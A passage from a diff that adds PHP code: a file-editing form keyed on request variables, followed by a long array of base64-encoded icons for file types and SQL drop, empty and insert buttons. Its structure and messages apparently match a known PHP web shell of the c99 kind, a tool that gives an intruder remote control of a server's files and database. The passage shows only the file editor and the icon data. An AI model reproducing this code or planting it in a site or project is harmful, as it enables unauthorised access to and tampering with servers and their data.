+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
